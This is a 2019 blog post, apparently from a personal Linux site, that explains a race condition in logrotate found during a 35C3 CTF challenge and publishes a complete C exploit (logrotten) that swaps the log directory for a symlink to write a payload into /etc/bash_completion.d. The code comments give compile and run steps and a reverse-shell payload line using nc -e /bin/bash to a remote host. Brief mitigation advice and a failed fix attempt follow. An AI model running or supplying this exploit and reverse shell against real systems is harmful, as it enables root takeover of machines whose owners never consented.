FyhTech - Fun with Linux https://tech.feedyourhead.at/rss.xml en Abusing a race condition in logrotate to elevate privileges https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges <span class="field field--name-title field--type-string field--label-hidden">Abusing a race condition in logrotate to elevate privileges</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Together with a friend we took part of the Capture The Flag at the 35C3. One challenge was that one:</p> <blockquote> <p>Logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large. It also gives you a root shell.</p> </blockquote> <p>After searching at google I found out about a race condition in logrotate. In many <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=400198">bug reports</a> it was stated that a race condition exists <s>if logrotate gets executed with the "create" option</s>. A very detailed and brilliant analysis of the problem could be found at the blog of the <a href="https://blog.nsogroup.com/logrotate-zajebiste-500-points/">nsogroup</a>. Their exploit was very specific for the CTF challenge and it needs a suid binary that executes run-parts(cron). It worked for the CTF and I guess they earned their points. I was too slow and did not solve the challenge but I tried to finish it at home. My approach was to use inotify on /tmp/log/pwn.log to trigger the race. It seems that the logrotate bug could be exploited on live environments.</p> <h3>Requirements</h3> <p>In order to exploit this vulnerability for privilege escalation the following requirements must be met:</p> <ul> <li>logrotate has to be run as user root</li> <li>an unprivileged user has to be in control of the logdir-path</li> <li>the configfile should include the "create"-option.</li> </ul> <p>An attacker could elevate his privileges by writing reverse-shells into directories like "/etc/bash_completition.d/". This is how the logrotate-config looks like:</p> <pre> <code> /tmp/log/pwnme.log { daily rotate 12 missingok notifempty size 1k create } </code></pre> <p>My unprivileged user is totally in control of /tmp/log/:</p> <pre> <code> osboxes@osboxes:~$ ls -l /tmp/log total 2940 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.0 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.1 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.10 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.11 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.12 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.13 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.2 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.3 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.4 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.5 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.6 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.7 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.8 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.9 osboxes@osboxes:~$ ls -ld /tmp/log drwxr-xr-x 2 osboxes osboxes 4096 Jan 14 15:34 /tmp/log </code></pre> <h3>Exploit</h3> <p>The vulnerability can be triggerd by replacing /tmp/log by a symlink to /etc/bash_completition.d after /tmp/log/pwnme.log got renamed. I wrote the following <a href="https://github.com/whotwagner/logrotten">Exploit</a>:</p> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;">&nbsp; <span style="color: #808080; font-style: italic;">/* * logrotate poc exploit * * [ Brief description ] * - logrotate is prone to a race condition after renaming the logfile. * - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories. * - An attacker could elevate his privileges by writing reverse-shells into * directories like &quot;/etc/bash_completition.d/&quot;. * - This vulnerability was found during a challenge at the 35c3 CTF * ( https://ctftime.org/event/718 ) * - A detailed description and a PoC of this challenge was written by the * - nsogroup ( https://blog.nsogroup.com/logrotate-zajebiste-500-points/ ) * * [ Precondition for privilege escalation ] * - Logrotate needs to be executed as root * - The logpath needs to be in control of the attacker * - &quot;create&quot; option is set in the logrotate configuration. * This exploit might not work without * * [ Tested version ] * - Debian GNU/Linux 9.5 (stretch) * - Amazon Linux 2 AMI (HVM) * - Ubuntu 18.04.1 * - logrotate 3.8.6 * - logrotate 3.11.0 * - logrotate 3.15.0 * * [ Compile ] * - gcc -o logrotten logrotten.c * * [ Prepare payload ] * - echo &quot;if [ `id -u` -eq 0 ]; /bin/nc -e /bin/bash myhost 3333 &amp;; fi&quot; &gt; payloadfile * * [ Run exploit ] * - nice -n -20 ./logrotten /tmp/log/pwnme.log payloadfile * * [ Known Problems ] * - It's hard to win the race inside a docker container * * [ Mitigation ] * - make sure that logpath is owned by root * - or use option &quot;nocreate&quot; * * [ Author ] * - Wolfgang Hotwagner * * [ Contact ] * - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges * - https://github.com/whotwagner/logrotten */</span> &nbsp; <span style="color: #339933;">#include &lt;stdio.h&gt;</span> <span style="color: #339933;">#include &lt;stdlib.h&gt;</span> <span style="color: #339933;">#include &lt;errno.h&gt;</span> <span style="color: #339933;">#include &lt;sys/types.h&gt;</span> <span style="color: #339933;">#include &lt;sys/inotify.h&gt;</span> <span style="color: #339933;">#include &lt;unistd.h&gt;</span> <span style="color: #339933;">#include &lt;string.h&gt;</span> <span style="color: #339933;">#include &lt;alloca.h&gt;</span> <span style="color: #339933;">#include &lt;sys/stat.h&gt;</span> &nbsp; &nbsp; <span style="color: #339933;">#define EVENT_SIZE ( sizeof (struct inotify_event) )</span> <span style="color: #339933;">#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )</span> &nbsp; <span style="color: #808080; font-style: italic;">/* use TARGETDIR without &quot;/&quot; at the end */</span> <span style="color: #339933;">#define TARGETDIR &quot;/etc/bash_completion.d&quot;</span> &nbsp; <span style="color: #339933;">#define DEBUG 1</span> &nbsp; <span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #993333;">int</span> argc<span style="color: #339933;">,</span> <span style="color: #993333;">char</span><span style="color: #339933;">*</span> argv<span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">int</span> length<span style="color: #339933;">,</span> i <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> index <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> fd<span style="color: #339933;">;</span> <span style="color: #993333;">int</span> wd<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> buffer<span style="color: #009900;">&#91;</span>EVENT_BUF_LEN<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>payloadfile<span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logfile<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logpath<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logpath2<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>targetpath<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>targetdir<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> ch<span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>p<span style="color: #339933;">;</span> FILE <span style="color: #339933;">*</span>source<span style="color: #339933;">,</span> <span style="color: #339933;">*</span>target<span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&lt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fprintf.html"><span style="color: #000066;">fprintf</span></a><span style="color: #009900;">&#40;</span>stderr<span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;usage: %s &lt;logfile&gt; &lt;payloadfile&gt; [targetdir]<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; logfile <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> payloadfile <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j<span style="color: #339933;">=</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">!=</span> <span style="color: #ff0000;">'/'</span> <span style="color: #339933;">&amp;&amp;</span> j <span style="color: #339933;">!=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> j<span style="color: #339933;">--</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; index <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span>j<span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #339933;">;</span> &nbsp; p <span style="color: #339933;">=</span> <span style="color: #339933;">&amp;</span>logfile<span style="color: #009900;">&#91;</span>index<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; logpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2 <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&gt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> targetdir <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span> targetdir<span style="color: #339933;">=</span> TARGETDIR<span style="color: #339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;/&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> j <span style="color: #339933;">&lt;</span> index<span style="color: #339933;">;</span> j<span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcpy.html"><span style="color: #000066;">strcpy</span></a><span style="color: #009900;">&#40;</span>logpath2<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'2'</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*creating the INOTIFY instance*/</span> fd <span style="color: #339933;">=</span> inotify_init<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span> DEBUG <span style="color: #339933;">==</span> <span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logfile: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath2: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetdir: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetdir<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;p: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*checking for error*/</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> fd <span style="color: #339933;">&lt;</span> <span style="color: #0000dd;">0</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/perror.html"><span style="color: #000066;">perror</span></a><span style="color: #009900;">&#40;</span> <span style="color: #ff0000;">&quot;inotify_init&quot;</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; wd <span style="color: #339933;">=</span> inotify_add_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span>logpath<span style="color: #339933;">,</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">while</span><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> i<span style="color: #339933;">=</span><span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> length <span style="color: #339933;">=</span> read<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> buffer<span style="color: #339933;">,</span> EVENT_BUF_LEN <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span>i <span style="color: #339933;">&lt;</span> length<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span>event <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span> <span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;</span>buffer<span style="color: #009900;">&#91;</span> i <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>len <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>mask <span style="color: #339933;">&amp;</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcmp.html"><span style="color: #000066;">strcmp</span></a><span style="color: #009900;">&#40;</span>event<span style="color: #339933;">-&gt;</span>name<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span> <span style="color: #339933;">==</span> <span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #808080; font-style: italic;">/* printf( &quot;Something is moved %s.\n&quot;, event-&gt;name ); */</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/rename.html"><span style="color: #000066;">rename</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> symlink<span style="color: #009900;">&#40;</span>targetdir<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> sleep<span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> source <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>payloadfile<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;r&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>source <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; target <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;w&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>target <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span>ch <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fgetc.html"><span style="color: #000066;">fgetc</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!=</span> EOF<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fputc.html"><span style="color: #000066;">fputc</span></a><span style="color: #009900;">&#40;</span>ch<span style="color: #339933;">,</span> target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; chmod<span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>S_IRUSR <span style="color: #339933;">|</span> S_IXUSR <span style="color: #339933;">|</span> S_IRGRP <span style="color: #339933;">|</span> S_IXGRP <span style="color: #339933;">|</span> S_IROTH <span style="color: #339933;">|</span> S_IXOTH<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> i <span style="color: #339933;">+=</span> EVENT_SIZE <span style="color: #339933;">+</span> event<span style="color: #339933;">-&gt;</span>len<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #808080; font-style: italic;">/*removing from the watch list.*/</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*closing the INOTIFY instance*/</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span></pre></div> <p>As soon as root logs in, the reverse shell gets executed with root privileges.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/logrotate2.mp4" type="video/mp4" /></video> </p> <p>&nbsp;</p> <h3>Known Issues</h3> <p>I wasn't able to win the race inside a docker container.</p> <p>&nbsp;</p> <h3>Update</h3> <p>I disgraced myself by trying to fix this without much knowledge about race conditions. Not only that my fix opened a memory leak by not freeing lstat()-space, it also didn't fix the problem(. I tried to check if the path contains a symlink right before the open() for the file touching happens. This made the time window a bit smaller and it was enough for this exploit. But a time window still exists. I am even not sure if a proper solution for that problem exist, without changing a lot of code and without creating other problems.&nbsp;</p> <p>Even if I feel quite bad for my failed attempt to fix this and for my very sloppy code, I learned a lot from this experience.</p> <p>&nbsp;</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 14 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" 